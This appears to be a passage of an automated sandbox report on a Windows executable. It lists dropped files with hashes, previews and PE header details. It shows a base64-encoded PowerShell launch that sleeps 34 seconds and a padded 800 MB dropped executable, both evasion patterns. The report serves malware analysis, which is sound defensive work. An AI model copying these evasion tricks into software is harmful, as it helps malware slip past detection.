                                                                                                                                                                      Preview:/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var d,e=e||{};e.scope={};e.arrayIteratorImpl=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};e.arrayIterator=function(a){return{next:e.arrayIteratorImpl(a)}};e.ASSUME_ES5=!1;e.ASSUME_NO_NATIVE_MAP=!1;e.ASSUME_NO_NATIVE_SET=!1;e.SIMPLE_FROUND_POLYFILL=!1;e.ISOLATE_POLYFILLS=!1;e.FORCE_POLYFILL_PROMISE=!1;e.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.e.defineProperty=e.ASSUME_ES5||"function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};e.getGlobal=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");};e.global=e.getGlobal(this);.e.IS_SYMBOL_NATIVE="func
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):261316
                                                                                                                                                                      Entropy (8bit):5.444466092380538
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:1709B6F00A136241185161AA3DF46A06
                                                                                                                                                                      SHA1:33DA7D262FFED1A5C2D85B7390E9DBC830CBE494
                                                                                                                                                                      SHA-256:5721A4B3F8E09C869A629EFFD350B51C9D46F0AC136717D4DB6265C0EE6F9AC8
                                                                                                                                                                      SHA-512:26835B4C050F53AD2DDB84469DF9A84BBB2786A655AB52DFC20B54BEDCB81D1ECD789198D5B7D8B940242E5CEAC818A177444D402397AE82C203438C4B1D19CB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var b,k=k||{};k.scope={};k.createTemplateTagFirstArg=function(a){return a.raw=a};k.createTemplateTagFirstArgWithRaw=function(a,c){a.raw=c;return a};k.arrayIteratorImpl=function(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}};k.arrayIterator=function(a){return{next:k.arrayIteratorImpl(a)}};k.makeIterator=function(a){var c="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return c?c.call(a):k.arrayIterator(a)};.k.arrayFromIterator=function(a){for(var c,d=[];!(c=a.next()).done;)d.push(c.value);return d};k.arrayFromIterable=function(a){return a instanceof Array?a:k.arrayFromIterator(k.makeIterator(a))};k.ASSUME_ES5=!1;k.ASSUME_NO_NATIVE_MAP=!1;k.ASSUME_NO_NATIVE_SET=!1;k.SIMPLE_FROUND_POLYFILL=!1;k.ISOLATE_POLYFILLS=!1;k.FORCE_POLYFILL_PROMISE=!1;k.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.k.objectCreate=k.ASSUME_ES5||"function"==typeof Object.cre
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1741
                                                                                                                                                                      Entropy (8bit):4.912380256743454
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:67BF9AABE17541852F9DDFF8245096CD
                                                                                                                                                                      SHA1:A4AC74DD258E8E0689034FAA1B15A5C7C56DC3BB
                                                                                                                                                                      SHA-256:10DFBD2D98950B79EE12F6B8E3885AABE31543048DE56AD4FC0A5E34D0D9D4EC
                                                                                                                                                                      SHA-512:298FA132C6F122798FDB9BC6DE8024915147ADC20355B56A92F0ED9ACCE4549BE6E7F42212E07DCA166E31624D4E66E299565845D4BA1C51CA935050641B61FE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:html, body {. margin: 0;. overflow: hidden;.}..webview {. width: 100%;. height: 100%;. min-height: 100%;. position: absolute;.}...craw_overlay {. position: absolute;.. left: 0;. top: 0;. right: 0;. bottom: 0;.. background-color: white;.. -webkit-transition: opacity 250ms linear;.. display: -webkit-flex;. -webkit-flex-direction: column;. -webkit-flex: 1 0%;. -webkit-align-items: center;. -webkit-justify-content: center;.. -webkit-app-region: drag;.}...craw_overlay img {. margin: 16px;.}..#loading_overlay {. opacity: 1;.}..#offline_overlay {. opacity: 0;. display: none;.}..#offline_overlay > img {. -webkit-filter: saturate(0%);.}..#offline_overlay > span {. font-family: 'Open Sans', 'Deja Vu Sans', Arial, sans-serif;. font-size: 15px;. line-height: 21px;. color: #8d8d8d;. display: block;.}..#loading_splash {. width: 128px;. height: 128px;.}..#drag_overlay {. position: absolute;. left: 0;. top: 0;. right: 0;. bottom: 0;. pointer-events: none;. -webkit
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):810
                                                                                                                                                                      Entropy (8bit):4.723481385335562
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:34A839BC40DEBC746BBD181D9EF9310C
                                                                                                                                                                      SHA1:8B4EAA74D31EED5B0BABA3CA5460201F6B10DA46
                                                                                                                                                                      SHA-256:BB8742615E4CD996AE5D0200E443AE6A6F0B473255F03AFFDB8FB4660DE4554D
                                                                                                                                                                      SHA-512:EE81E5509CBC2CB2B6C834224688C1E1B1AA9AA3866C52F8EAED040D5C390653C52D8D681E2E2CF62906643962ABAC823D5B622385B983B21E0DCCAFDF281EFF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:<!DOCTYPE html>.<html>. <head>. <link href="/css/craw_window.css" rel="stylesheet">. <script src="/craw_window.js"></script>. </head>. <body>. <webview></webview>. <div class="craw_overlay" id="loading_overlay">. <img src="/images/icon_128.png" />. <img src="/images/flapper.gif" />. </div>. <div class="craw_overlay" id="offline_overlay">. <img src="/images/icon_128.png" />. <span id="app_unavailable"></span>. <span id="connect_to_network"></span>. </div>. <div id="drag_overlay"></div>. <div id="top_bar">. <div id='close_button'>. <img src='/images/topbar_floating_button_close.png'/>. </div>. <div id='maximize_button'>. <img src='/images/topbar_floating_button_maximize.png'/>. </div>. </div>. </body>.</html>.
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:GIF image data, version 89a, 30 x 30
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):70364
                                                                                                                                                                      Entropy (8bit):7.119902236613185
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:398ABB308EEBC355DA70BCE907B22E29
                                                                                                                                                                      SHA1:CFFB77B8A1724B8F81D98C6D6AD0071D10162252
                                                                                                                                                                      SHA-256:2B73533F47A99FFEA9CC405FFAFA9C4C53623F62487AEBFBA415945120B22040
                                                                                                                                                                      SHA-512:FC7A56FC8A61A582161874B54ADBAD30A84840190008EDB0B6FBF84F91393CA58E988E3FE446F11A0C3C691C18249B93AEC2904B3D0C4F0857D79034F662385A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:GIF89a.......................................................!.......!..NETSCAPE2.0.....,.............9.:.h0.bT(6.!l.&..("g*k..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,.............9.:.h0.bT(6.!l.&..("g*k..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,............................................................................................................'..w=.....\.)._6.k..OF...n.#\~"....2b3..I.)..eu.Q.`.e......gr.?>.s.I0.....@.~.Tr.[8.+.,.;..EE....S.*f.....,.....B8/D..;.9.q......ukC...r.I.....j......BGY...o2J....+O4....X4.....cH%7....I.....0H!.!.....!.,.............................................................................................................................................................................................................p8.a$....hh@.4....X,A.0L..(....JX.j...,..........z.X.Q....jB.d....B..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4364
                                                                                                                                                                      Entropy (8bit):7.915848007375225
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:4DBC9F9E6F5A08D299BAC9E54DF07694
                                                                                                                                                                      SHA1:BB38F5DE34B1E0BE1109220BA55271087A4D9EA5
                                                                                                                                                                      SHA-256:91C2718DD23B4356D71F88F6146868369033291086DF327534546DFA459BEB0E
                                                                                                                                                                      SHA-512:A5F2B1F47502836130D8083F757B7773C1E1CB36B76AD298CC29AB2B428C8002D2F15BD839838FC326DAC3681C2F48AB25A3E7631D33726C4B25E8EC14170912
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.PNG........IHDR..............>a.....IDATx..yp.....gF#.:,[H.l.l..8...`/.k....,!a7Km...E...Te..T.....J...p....%.(....+...3....eY.e...L.o...5....h4...\....{?....~.u.`0.....`0.....`0.....`.Y......[(.......).4....ai..w38.+....Bf././..]...{......8...3.....3W~OJ.. /...u6V.C..U.0.+._=.c..9.X.?....L....S@.L...m.0..>.C...L|TF.p5..f4M.,.V....8..a.<...RP..@)E,..E"...h.....!...-....,I..T..........m..._[[{w{{....{*.^......M.x..h4.h.....\.R.E....j).7.....h4.A.E....,. ...iii.Vj?2...=/.B.FK9P..@)=Rj..D".Y...2.B..x.}0...&J...2.......f.O..e.H.....!.J)'I..R....B............QJ;K..L...L.l".L~mhh.R.@).FFF~.L&...~.B.......u.........}.....~.....f..yUU...........^M...6......].,w.e..~.!$.C.R.....E(%e9.,....k..@...W8.........@...........O..@%.~..@.S..P.....`Tp...."...?ME..c......s...`..S1...7.b..aNE..k...3.yP.}.Ch.}......B..........IPE..C.<....T....k......Z..o_......g........P..A=y.J.)h..@.q.-.*].AU.4...F.M.....y%B]+ .\.~..9......:..=...r.....E].o...F..P........i...|....
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):558
                                                                                                                                                                      Entropy (8bit):7.505638146035601
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:FB9C46EA81AD3E456D90D58697C12C06
                                                                                                                                                                      SHA1:5FC450F7D73CCFAC8F0D818CB3392BA4D91B69DE
                                                                                                                                                                      SHA-256:016CA659BA080E194FBFC0929602B16506ED60AA6019FAA51410C4FD93B583E8
                                                                                                                                                                      SHA-512:ADD810EE9EB7CAEC505B5FD90A1F184CE39D8F8C689DCC240F188FE353B9575489492E07D572A3B1C11A1555CE66AFCA5134903E4C1AA3D54BC7C5ED3E65B50C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.PNG........IHDR................a....IDAT8...Mk.Q...;... .....F..QW.....F....J.?.w..7~......'.Q..B]... .QS...M&_w..b&.|`......p...f.?.D$.y^..........y*...\..Z..t6..oRj.@&.u..G.qN).t.-V*.>(.N.Ep]wFk.60o.]0.`Y..cT..Y.Tb.`DF.d..s.Z..E..9.4._C.._...%..*.^....4.l...Y..X..R..../...Wj+w0[.].._B.k.${.\.>.%...........lz .w.ALxo.2;..a...".p..S..&..uXS...<..6..[..zD.._.N+w.WbM7ye6X<...'(,=.r}........$f..5..P....k..."..8.s.<zgSm@.....).Y.....:e..|.....F...I..A$.....T?.....m....8.........N...z.....V..vd.h'....C.?.....H.;]..C.M.....9.b......IEND.B`.
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):160
                                                                                                                                                                      Entropy (8bit):5.475799237015411
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:8803665A6328D23CC1014A7B0E9BE295
                                                                                                                                                                      SHA1:9DA6EE729D5A6E9F30658B8EC954710F107A641F
                                                                                                                                                                      SHA-256:D5F9234DC36E7FFA85F35B2359A4F82276F8395EFA76E4553507EA990B27FC6C
                                                                                                                                                                      SHA-512:ECD9E71B8BA1ED8BD4CA5A0936CB66A83611C4ABCBDA76C250F4CDF4AD80320212E8F5EEB79A38910718F8346ECC1AD580A3FA835EC2B22BE497F36899FB5930
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...Q..0......2...(p...~Z.}'.>I%O...V!s..................../...`.<..`.....IEND.B`.
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):252
                                                                                                                                                                      Entropy (8bit):6.512071394066515
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:0599DFD9107C7647F27E69331B0A7D75
                                                                                                                                                                      SHA1:3198C0A5F34DB67F91A0035DBC297354CBC95525
                                                                                                                                                                      SHA-256:131817CD9311C03DF22D769DD2AD7FA2E6E9558863A89F7E5E1657424031A937
                                                                                                                                                                      SHA-512:0076ACB9D6A886BD987876E49495038F9388B292A9EFE5C9093CCA64CA3692E3A5D24E35172C7697F6AAE34B86CA217EE59C003423E46D9499BD27EC7D77A649
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...... ..Pp.X....H...b@...|.^LC_.E.BP+......X.P..........q..~..p/. ..s.....%D^...$......@.!...<...).?.4{.k.G3...4..[cH..0..l.8.!r..m.R..{..........`.f...#.x.....IEND.B`.
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):160
                                                                                                                                                                      Entropy (8bit):5.423186859407619
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:7CB6B9DC1A30F63B8BD976924B75AD96
                                                                                                                                                                      SHA1:0C40B0C496D2F2B5F2021C117EC8610AC03AB469
                                                                                                                                                                      SHA-256:721B7AAA9A42A54A349881615A12E3A26983ACA48E173FD2F66E66AA0D725735
                                                                                                                                                                      SHA-512:4764937364E355956B242B84010AC56102536D2AACBE4227F0E88E4DE7AB468571957EA6C33012539156E5349AE4F777115615AE3361F60ADDF9CD227424F76A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B.z.s...*.....$.<u..[...................h.......C.CA).....IEND.B`.
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):166
                                                                                                                                                                      Entropy (8bit):5.8155898293424775
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:232CE72808B60CBE0F4FA788A76523DF
                                                                                                                                                                      SHA1:721A9C98C835D2CD734153BBE07833C6637ECD68
                                                                                                                                                                      SHA-256:AFA4EA944CBDEC8543242E627EF46D5BFD3766DCAC664E7E50CDEEF2B352740C
                                                                                                                                                                      SHA-512:4048EEA5A78DD569521C488C4CE4F7B77AC0454C92EE9107A81A1B3AF91A4EE036039AC1A0A6B8DD26B12E7F1595DB80B7FAA7B6A25D9032BF385528A81A8654
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...HIDATx......0.CQS.......~..."..........m.v+Sq....<!...M8m...'...@$..0....E........IEND.B`.
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):160
                                                                                                                                                                      Entropy (8bit):5.46068685940762
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:E0862317407F2D54C85E12945799413B
                                                                                                                                                                      SHA1:FA557F8F761A04C41C9A4BA81994E43C6C275DBB
                                                                                                                                                                      SHA-256:5C10CE0589EB115600F77381130B70AE0B7B3752614D86D4C89E857658AA222B
                                                                                                                                                                      SHA-512:07CB69327961FD0019BEF8EF7590B5524905AC373A815F73F6D9E0B26840929F919A96CAA977D4B5656704DACD0F352D568FB3997F80EE6BB94C95B58839DBFE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B..@wu...*.....$.<u..[...................h.........M..x(....IEND.B`.
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1322
                                                                                                                                                                      Entropy (8bit):5.449026004350873
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:01334FB9D092AF2AA46C4185E405C627
                                                                                                                                                                      SHA1:47AD3C0E82362FFE5B881DF8D71D6F79AB7F5796
                                                                                                                                                                      SHA-256:F52714812D68C577A445169D11E84DF6751C2D6886BC429643072BB5D61C6C27
                                                                                                                                                                      SHA-512:888D96ADB7A847ABE472145258C8C46950EB2FA3BA7D596C2E90A17C8FB06FD0155C56CC8ABA5D076D89368417464BCB2D236F9E40E53241950A01F9F8ED548F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app": {.. "background": {.. "scripts": [ "craw_background.js" ].. }.. },.. "default_locale": "en",.. "description": "__MSG_APP_DESCRIPTION__",.. "display_in_launcher": false,.. "display_in_new_tab_page": false,.. "icons": {.. "128": "images/icon_128.png",.. "16": "images/icon_16.png".. },.. "key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrKfMnLqViEyokd1wk57FxJtW2XXpGXzIHBzv9vQI/01UsuP0IV5/lj0wx7zJ/xcibUgDeIxobvv9XD+zO1MdjMWuqJFcKuSS4Suqkje6u+pMrTSGOSHq1bmBVh0kpToN8YoJs/P/yrRd7FEtAXTaFTGxQL4C385MeXSjaQfiRiQIDAQAB",.. "manifest_version": 2,.. "minimum_chrome_version": "29",.. "name": "__MSG_APP_NAME__",.. "oauth2": {.. "auto_approve": true,.. "client_id": "203784468217.apps.googleusercontent.com",.. "scopes": [ "https://www.googleapis.com/auth/sierra", "https://www.googleapis.com/auth/sierrasandbox", "https://www.googleapis.com/auth/chromewebstore", "https://www.googleapis.com/auth/chromewebstore.readonly" ].. },.
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1003
                                                                                                                                                                      Entropy (8bit):5.174849099281799
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:04EF4A478B70410370D6F34166866B60
                                                                                                                                                                      SHA1:EC431565869C943F064A29F0F2AD1D2988FB9B84
                                                                                                                                                                      SHA-256:E9F8A5618048388E3D0AA94CA3372BB596BD35161B8EEB476F96142D46556458
                                                                                                                                                                      SHA-512:3818804DC7FFD4E0209A6A0713C53A83A6DB6BC817A0DE5932BDC3FEBAF8A6CB45207508E23DCB4CD94EAC07076D7A4621752E8144BEE78D41006105040162AE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.**********************..Windows PowerShell transcript start..Start time: 20220823182920..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 724536 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==..Process ID: 6816..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220823182920..**********************..PS>Start-Sleep -Seconds 34..**********************..Command start time: 20220823183343..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20220823183343..*********************
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):802923024
                                                                                                                                                                      Entropy (8bit):0.040175728259234884
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:5EE0DDAA8C76BCAA4FEF16CFF262AB97
                                                                                                                                                                      SHA1:EF6E33FC3173B4AD3567719DB7A3EF849C871BC9
                                                                                                                                                                      SHA-256:62BA171D843690721D4D888E268AAC30CC461BAC1D8CCDB6D3C12CDB2A9C9B8E
                                                                                                                                                                      SHA-512:88AF2535CE71B872D3596E1A8B8DDCC4F6FE586D285F605F90245DCE043849DA6A4628459AC8AFD07D8EC75C39F02CBF23599D42A5A56D849C7B0ECA8492DF8C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\.u.\.u.\.u.3...T.u.3.....u.U...Y.u.\.t..u.3...S.u.3...].u.\...Z.u.3...].u.Rich\.u.........................PE..L...|..X............................`R............@.................................u.......................................d...<.......(............................................................*..@...............8............................text............................... ..`.data....;..........................@....rsrc...(...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Entropy (8bit):7.964323645363752
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.24%
                                                                                                                                                                      • InstallShield setup (43055/19) 0.43%
                                                                                                                                                                      • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                                                                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                      File name:q1wLT3xKiY.exe
                                                                                                                                                                      File size:2701003
                                                                                                                                                                      MD5:45597a36ace0c0df1890299d8d82d938
                                                                                                                                                                      SHA1:285a4ee677b9f7675a0fffe9813488fcdeff7948
                                                                                                                                                                      SHA256:dd0145067f81bf5aff9a7ee7eb56c11a98a5f69a9bdbc36744919ee49890de5a
                                                                                                                                                                      SHA512:107284b6acebe67386177a2251099d98715a3d1f5e565eaf9dd490a4235f80108475983122199e85533df1f15b1ba330c80969e26bc5fcf8072fcf42ff6edcc3
                                                                                                                                                                      SSDEEP:49152:pAI+cNpJc7YrEa2u2h9swu+AU3Z9CcVL2wD+aRpXPaAt1DD4S6sdsWjIa:pAI+Oc8rHJ2jHxZYOTDrRxaAt1DES6o/
                                                                                                                                                                      TLSH:FFC53335F182817ED0221E35451386F6B63DFA0C0F7E64DABACD1E1948173892F692BE
                                                                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                      Icon Hash:a2a0b496b2caca72
                                                                                                                                                                      Entrypoint:0x425468
                                                                                                                                                                      Entrypoint Section:CODE
                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                      DLL Characteristics:
                                                                                                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:4
                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                      File Version Major:4
                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                      Import Hash:c9adc83b45e363b21cd6b11b5da0501f
                                                                                                                                                                      Instruction
                                                                                                                                                                      push ebp
                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                      add esp, FFFFFFF0h
                                                                                                                                                                      mov eax, 00425388h
                                                                                                                                                                      call 00007F30BCA7B239h
                                                                                                                                                                      mov eax, 004254C8h
                                                                                                                                                                      call 00007F30BCA7DC3Fh
                                                                                                                                                                      mov edx, dword ptr [00428840h]
                                                                                                                                                                      mov dword ptr [edx], eax
                                                                                                                                                                      mov edx, dword ptr [00428840h]
                                                                                                                                                                      mov edx, dword ptr [edx]
                                                                                                                                                                      mov eax, dword ptr [00428848h]
                                                                                                                                                                      call 00007F30BCA993F9h
                                                                                                                                                                      mov edx, dword ptr [00428840h]
                                                                                                                                                                      mov edx, dword ptr [edx]
                                                                                                                                                                      mov eax, dword ptr [004287DCh]
                                                                                                                                                                      call 00007F30BCA9248Fh
                                                                                                                                                                      mov eax, dword ptr [00428840h]
                                                                                                                                                                      call 00007F30BCA80EC1h
                                                                                                                                                                      call 00007F30BCA7A0F4h
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add bh, bh
                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2b0000x1798.idata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x310000x1cdc.rsrc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2f0000x1884.reloc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x2e0000x18.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                      CODE0x10000x244cc0x24600False0.5598689862542955data6.5944280484489814IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      DATA0x260000x28940x2a00False0.31556919642857145data3.7937570409882295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      BSS0x290000x10f50x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .idata0x2b0000x17980x1800False0.3977864583333333data4.885545060649106IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .tls0x2d0000x80x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
